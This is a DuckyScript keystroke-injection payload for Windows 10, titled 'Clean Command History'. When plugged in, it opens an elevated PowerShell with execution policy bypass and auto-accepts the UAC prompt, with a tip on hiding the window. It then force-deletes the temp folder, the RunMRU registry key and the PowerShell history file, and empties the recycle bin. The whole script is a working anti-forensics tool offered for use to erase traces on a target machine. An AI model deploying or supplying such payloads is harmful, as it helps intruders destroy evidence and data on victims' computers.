REM Title: Clean Command History
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Empty the temp folder and recycle bin, clear run box and powershell history.
REM Target: Windows 10
REM Credit: I-Am-Jakoby

REM some setup for dukie script.
DEFAULT_DELAY 100

GUI r
DELAY 750

REM open powershell (add "-W Hidden" to hide the window).
STRING powershell -NoP -NonI -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue ; reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f ; Remove-Item (Get-PSreadlineOption).HistorySavePath ; Clear-RecycleBin -Force -ErrorAction SilentlyContinue
ENTER
DELAY 10000
STRING exit
ENTER
